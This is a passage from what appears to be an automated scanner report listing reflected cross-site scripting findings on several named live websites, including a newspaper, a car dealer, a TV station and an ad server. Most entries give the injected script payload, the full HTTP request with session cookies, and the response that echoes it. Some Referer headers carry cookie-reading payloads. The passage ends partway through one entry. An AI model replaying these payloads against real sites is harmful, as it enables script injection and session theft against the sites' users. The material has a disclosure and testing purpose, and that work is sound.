Severity:   High
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /business/120319724.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb2c"><script>alert(1)</script>340a03fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /business/120319724.html?8fb2c"><script>alert(1)</script>340a03fd30=1 HTTP/1.1
Host: www.startribune.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b8
Content-Type: text/html;charset=utf-8
Date: Sun, 24 Apr 2011 03:10:02 GMT
Connection: close
Content-Length: 130632


                                                                                                   
...[SNIP]...
<input type="hidden" name="rurl" value="http://www.startribune.com/business/120319724.html?8fb2c"><script>alert(1)</script>340a03fd30=1" />
...[SNIP]...

2.87. http://www.startribune.com/share [shareURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /share

Issue detail

The value of the shareURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8c00"><script>alert(1)</script>b9311f1e57f was submitted in the shareURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /share?shareURL=http://www.startribune.com/business/120319724.htmle8c00"><script>alert(1)</script>b9311f1e57f HTTP/1.1
Host: www.startribune.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b8
Content-Type: text/html;charset=utf-8
Date: Sun, 24 Apr 2011 03:11:38 GMT
Connection: close
Content-Length: 2045

<html>
   <head>
       <style type="text/css">
       .shareIconsWraper{float:left;width:100%;}
       .shareIconsWraper .icon{padding:0 12px 10px 0; float:left}    
       .shareIconsWraper .last{padding:0 0 10px 0 !im
...[SNIP]...
<a class="addthis_button_delicious" addthis:url="http://www.startribune.com/business/120319724.htmle8c00"><script>alert(1)</script>b9311f1e57f">
...[SNIP]...

2.88. http://www.startribune.com/share/ [shareURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /share/

Issue detail

The value of the shareURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c478"><script>alert(1)</script>5dda205ec15 was submitted in the shareURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /share/?shareURL=http%3A%2F%2Fwww.startribune.com%2Fbusiness%2F120319724.html1c478"><script>alert(1)</script>5dda205ec15 HTTP/1.1
Host: www.startribune.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u7-b7
Content-Type: text/html;charset=utf-8
Date: Sun, 24 Apr 2011 03:11:41 GMT
Connection: close
Content-Length: 2045

<html>
   <head>
       <style type="text/css">
       .shareIconsWraper{float:left;width:100%;}
       .shareIconsWraper .icon{padding:0 12px 10px 0; float:left}    
       .shareIconsWraper .last{padding:0 0 10px 0 !im
...[SNIP]...
<a class="addthis_button_delicious" addthis:url="http://www.startribune.com/business/120319724.html1c478"><script>alert(1)</script>5dda205ec15">
...[SNIP]...

2.89. http://www.volkswagensouthburlington.com/popups/entry.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volkswagensouthburlington.com
Path:   /popups/entry.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 845c2"><script>alert(1)</script>e30737451a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /popups845c2"><script>alert(1)</script>e30737451a8/entry.htm?detect=false HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=831047880a0a006e00d46b95e9acb101; JSESSIONID=3b6203h50frnu; ddcpoolid=CmsPoolG; sifrFetch=true; __utmz=1.1303574015.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1334335860.1303574015.1303574015.1303574015.1; __utmc=1; __utmb=1.2.10.1303574015

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 18968
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:58 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms22.dealer.ddc p7070 -->

   <title>Volkswagen South Burlington, Vermont | VW Dealers Burlington, VT | New & Used Car Dealers
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=www.volkswagensouthburlington.com&amp;21=/popups845c2"><script>alert(1)</script>e30737451a8/entry.htm&amp;50=831047880a0a006e00d46b95e9acb101&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=1
...[SNIP]...

2.90. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volkswagensouthburlington.com
Path:   /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef0f"><script>alert(1)</script>80e774f468f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used8ef0f"><script>alert(1)</script>80e774f468f/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Content-Length: 20400
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:26 GMT
Connection: close
Set-Cookie: ssoid=831124ba0a0a006e00d46b954817a3d3;path=/
Set-Cookie: JSESSIONID=29lnqliatcsk1;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms22.dealer.ddc p7070 -->

   <title>Volkswagen South Burlington, Vermont | VW Dealers Burlington, VT | New & Used Car Dealers
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=www.volkswagensouthburlington.com&amp;21=/used8ef0f"><script>alert(1)</script>80e774f468f/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&amp;50=831124ba0a0a006e00d46b954817a3d3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp
...[SNIP]...

2.91. http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volkswagensouthburlington.com
Path:   /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3904f"><script>alert(1)</script>55cf2eacdc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used/Volkswagen3904f"><script>alert(1)</script>55cf2eacdc2/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:35 GMT
Connection: close
Set-Cookie: ssoid=8311469d0a0a006e00d46b956c42c509;path=/
Set-Cookie: JSESSIONID=9r64oibk9km39;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 74049

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms22.dealer.ddc p7070 -->

   <title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=&amp;20=www.volkswagensouthburlington.com&amp;21=/used/Volkswagen3904f"><script>alert(1)</script>55cf2eacdc2/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&amp;50=8311469d0a0a006e00d46b956c42c509&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64
...[SNIP]...

2.92. http://www.volkswagensouthburlington.com/webchat/live [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volkswagensouthburlington.com
Path:   /webchat/live

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 671b1<script>alert(1)</script>afcecb751d0 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webchat/live?action=isAvailable671b1<script>alert(1)</script>afcecb751d0&workgroup=shearervw@workgroup.chat.dealer.com HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=a5js2e6e1a785; ssoid=831047880a0a006e00d46b95e9acb101; JSESSIONID=3b6203h50frnu; ddcpoolid=CmsPoolG; sifrFetch=true; __utmz=1.1303574015.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1334335860.1303574015.1303574015.1303574015.1; __utmc=1; __utmb=1.2.10.1303574015

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.x (Linux/2.6.9-1.9_FC2hugemem i386 java/1.5.0_06
Content-Type: text/html;charset=ISO-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:53:49 GMT
Connection: close
Content-Length: 229

<b>Jive Live Assistant Servlet</b><hr><br>Content Type: null<br>Content Encoding: null<p><b>Parameters:</b><ul><li>action=isAvailable671b1<script>alert(1)</script>afcecb751d0<li>workgroup=shearervw@wo
...[SNIP]...

2.93. http://www2.wspa.com/whoami/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.wspa.com
Path:   /whoami/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 476e6<script>alert(1)</script>f0c6e3798ca was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /whoami/?callback=jsonp1303613688804476e6<script>alert(1)</script>f0c6e3798ca&_=1303613691725&date=1303613691724&cid=1751321&ctype=18&activity=View HTTP/1.1
Host: www2.wspa.com
Proxy-Connection: keep-alive
Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Content-Type: application/json
Content-Length: 75
Last-Modified: Sun, 24 Apr 2011 03:09:51 GMT
Server-Name: web2
X-Cache-Lookup: MISS from 210641-media2.tbo.com:8080
Server-Name: media1
Cache-Control: max-age=240
Expires: Sun, 24 Apr 2011 03:13:51 GMT
Date: Sun, 24 Apr 2011 03:09:51 GMT
Connection: close

jsonp1303613688804476e6<script>alert(1)</script>f0c6e3798ca([{'user': ''}])

2.94. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [1053353;167347;7653005851078549651;%5btimestamp%5d;M parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /a/diff/436/1053353/show0.asp

Issue detail

The value of the 1053353;167347;7653005851078549651;%5btimestamp%5d;M request parameter is copied into the HTML document as plain text between tags. The payload c46b7<script>alert(1)</script>0fc907875c1 was submitted in the 1053353;167347;7653005851078549651;%5btimestamp%5d;M parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;%5btimestamp%5d;Mc46b7<script>alert(1)</script>0fc907875c1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pbw=%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:36:40 GMT
Content-Length: 545

if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}

document.write('<a target="_blank" href="http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B7653005851078549651%3B%5btimestamp%5d%3BMc46b7<script>alert(1)</script>0fc907875c1%3B4107228%3Bclickvars=">
...[SNIP]...

2.95. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [1053353;167347;7653005851078549651;[timestamp];M parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /a/diff/436/1053353/show0.asp

Issue detail

The value of the 1053353;167347;7653005851078549651;[timestamp];M request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe8e2'-alert(1)-'4a361d38a0b was submitted in the 1053353;167347;7653005851078549651;[timestamp];M parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;[timestamp];Mfe8e2'-alert(1)-'4a361d38a0b HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6; pid=7653005851078549651; pdomid=4

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:37:25 GMT
Content-Length: 360


document.write('<a target="_blank" href="http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B7653005851078549651%3B[timestamp]%3BMfe8e2'-alert(1)-'4a361d38a0b%3B4107228%3Bclickvars=">
...[SNIP]...

2.96. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /a/diff/436/1053353/show0.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d523'-alert(1)-'f79aa0fec9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;[timestamp];M&1d523'-alert(1)-'f79aa0fec9c=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6; pid=7653005851078549651; pdomid=4

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:43:06 GMT
Content-Length: 363


document.write('<a target="_blank" href="http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B7653005851078549651%3B[timestamp]%3BM&1d523'-alert(1)-'f79aa0fec9c=1%3B4107228%3Bclickvars=">
...[SNIP]...

2.97. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /a/diff/436/1053353/show0.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9652a<script>alert(1)</script>43ca9da9cf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;%5btimestamp%5d;M&9652a<script>alert(1)</script>43ca9da9cf3=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pbw=%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:41:39 GMT
Content-Length: 548

if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}

document.write('<a target="_blank" href="http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347%3B7653005851078549651%3B%5btimestamp%5d%3BM&9652a<script>alert(1)</script>43ca9da9cf3=1%3B4107228%3Bclickvars=">
...[SNIP]...

2.98. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8692'-alert(1)-'f007626cf8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /call/adj/167347d8692'-alert(1)-'f007626cf8e/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo] HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:50:17 GMT
Content-Length: 360


document.write('<a target="_blank" href="http://www4.smartadserver.com/diff/436/1053353/go0.asp?1053353%3B167347d8692'-alert(1)-'f007626cf8e%3B7653005851078549651%3B[timestamp]%3BM%3B4107228%3Bclickvars=">
...[SNIP]...

2.99. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www4.smartadserver.com
Path:   /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no

Issue detail

